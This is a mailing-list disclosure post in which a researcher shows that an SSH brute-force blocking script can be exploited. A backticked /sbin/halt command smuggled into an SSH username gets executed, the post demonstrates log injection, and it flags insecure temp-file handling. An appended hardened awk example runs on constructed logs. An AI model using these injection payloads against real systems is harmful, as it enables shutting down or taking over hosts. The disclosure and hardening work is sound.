Full Disclosure mailing list archives
Re: SSH brute force blocking tool
From: Tavis Ormandy <taviso () gentoo org>
Date: Mon, 27 Nov 2006 21:02:31 +0000
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
> Tavis Ormandy wrote:
> > Nice work, really subtle rootkit. I like the email phone-home.
> >
> > Here's an exploit.
> >
> > #!/bin/sh
> > ssh 'foo bar `/sbin/halt`'@victim
>
> Since you seem to be clueless I'll answer step by step. Here goes idiot.
> (Sinful to see someone so clueless coming from Gentoo... Guess it goes
> with the romper room Linux territory)
>
> /////
> awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru >> /tmp/hosts.deny

insecure temporary file creation, race condition if a user can create
that file between the unlink and the open.

$ ssh "error retrieving"@localhost & ssh '`0wn3d`'@localhost
$ awk '/error retrieving/{getline;print $13}' /var/log/authlog
`0wn3d`

Oops.

Thanks, Tavis.

--
-------------------------------------
taviso () sdf lonestar org | finger me for my pgp key.
-------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
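
Added example, not part of the original message or of the tool under discussion: a hardened form of the quoted awk step that goes beyond the `$13` lookup by reading the address relative to the end of the log line, accepting only a strict dotted-quad IPv4 value, and collecting results in a mktemp-created file rather than a fixed name in /tmp. The sample log lines are constructed, and the trailing "from ADDR port N ssh2" layout and the function names are assumptions.

```shell
#!/bin/sh
# Added example. Log lines are constructed; the line tail "from ADDR port N ssh2"
# is an assumed sshd layout, not taken from the thread.

# Print unique IPv4 addresses from the line following each "error retrieving"
# match. The address is read relative to the END of the line and must be a
# strict dotted quad, so a username containing spaces or backticks can neither
# shift the field nor end up in the output.
extract_ips() {
    awk '
        function is_ipv4(s,   n, p, i) {
            n = split(s, p, ".")
            if (n != 4) return 0
            for (i = 1; i <= 4; i++)
                if (p[i] !~ /^[0-9][0-9]?[0-9]?$/ || p[i] + 0 > 255) return 0
            return 1
        }
        /error retrieving/ {
            if ((getline) <= 0) next
            if (NF > 4 && $(NF-4) == "from" && $(NF-2) == "port" && is_ipv4($(NF-3)))
                print $(NF-3)
        }
    ' "$1" | sort -u
}

# Collect results in a file created atomically by mktemp (exclusive create,
# owner-only mode) instead of a predictable path. Prints the new file's path.
build_deny_list() {
    out=$(mktemp "${TMPDIR:-/tmp}/deny.XXXXXX") || return 1
    extract_ips "$1" > "$out" || { rm -f "$out"; return 1; }
    printf '%s\n' "$out"
}

# Constructed sample log: one ordinary pair, one pair with a hostile username.
sample=$(mktemp) || exit 1
trap 'rm -f "$sample"' EXIT
cat > "$sample" <<'EOF'
Nov 27 21:00:01 host sshd[100]: error retrieving information about user bob
Nov 27 21:00:02 host sshd[100]: Failed password for invalid user bob from 192.0.2.10 port 4000 ssh2
Nov 27 21:00:03 host sshd[101]: error retrieving information about user foo bar `/sbin/halt`
Nov 27 21:00:04 host sshd[101]: Failed password for invalid user foo bar `/sbin/halt` from 192.0.2.20 port 4001 ssh2
EOF

extract_ips "$sample"
```

On the fourth sample line the thirteenth field is the backtick string, while the end-anchored lookup still yields 192.0.2.20.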